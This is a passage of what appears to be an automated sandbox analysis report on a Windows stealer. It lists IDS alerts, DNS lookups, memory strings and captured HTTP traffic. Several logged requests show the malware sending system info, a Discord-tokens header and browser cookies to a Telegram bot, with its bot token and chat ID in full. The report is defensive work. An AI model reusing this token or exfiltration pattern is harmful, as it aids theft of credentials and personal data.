Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56242 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56268 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56256 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56247 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56250 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56253 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56252 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56273 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56257 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56258 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56272 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56246 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56269 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56241 -> 149.154.167.220:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%F0%9F%92%8EDiscord%20tokens:%0A HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20065367%0AUser%20name:%20user%0ASystem%20time:%202024-09-02%2010:50:41%20am%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20654VB%0ARAM:%204095%20MB%0AHWID:%2073CF150472%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20New%20York,%20ID:%204070%0A%E2%84%B9%EF%B8%8FSend%20%22/4070*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20New%20York,%20ID:%202919%0A%E2%84%B9%EF%B8%8FSend%20%22/2919*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.28%20kb) HTTP/1.1Content-Type: multipart/form-data; boundary="ca64f802-3e8f-4ecc-96f4-25fd6e73bf55"Host: api.telegram.orgContent-Length: 588Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 98C8:320503:1B6693:1E0681:66D5D0A1Accept-Ranges: bytesDate: Mon, 02 Sep 2024 14:50:09 GMTVia: 1.1 varnishX-Served-By: cache-nyc-kteb1890087-NYCX-Cache: MISSX-Cache-Hits: 0X-Timer: S1725288609.423650,VS0,VE31Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: ef04b143d043dd955b05bfc31e75cada4c480233Expires: Mon, 02 Sep 2024 14:55:09 GMTSource-Age: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 98C8:320503:1B6693:1E0681:66D5D0A1Accept-Ranges: bytesDate: Mon, 02 Sep 2024 14:50:33 GMTVia: 1.1 varnishX-Served-By: cache-nyc-kteb1890040-NYCX-Cache: HITX-Cache-Hits: 1X-Timer: S1725288633.401634,VS0,VE1Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: a835bf5dddd5e5923717badded6782204d7fcaaaExpires: Mon, 02 Sep 2024 14:55:33 GMTSource-Age: 24
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 4BC6:2FE511:14088E6:1677DBF:66D5D0DEAccept-Ranges: bytesDate: Mon, 02 Sep 2024 14:51:11 GMTVia: 1.1 varnishX-Served-By: cache-nyc-kteb1890098-NYCX-Cache: MISSX-Cache-Hits: 0X-Timer: S1725288671.982740,VS0,VE39Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 771c01c7b7923e503ab0af36fb714f58690fda02Expires: Mon, 02 Sep 2024 14:56:11 GMTSource-Age: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Mon, 02 Sep 2024 14:51:13 GMTContent-Type: application/jsonContent-Length: 83Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 6AE5:37B4DD:13F9E6B:1669555:66D5D107Accept-Ranges: bytesDate: Mon, 02 Sep 2024 14:51:51 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740038-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1725288711.428111,VS0,VE9Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 99a520c9c5e293096a1acd5571badf6688b74ee3Expires: Mon, 02 Sep 2024 14:56:51 GMTSource-Age: 0

Source: based.exe, 00000007.00000003.2050911110.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: based.exe, 00000007.00000003.2050911110.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digiH
Source: iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2054109370.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: based.exe, 00000007.00000003.2054109370.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.coH
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9CD000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4012000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4012000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041851174.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 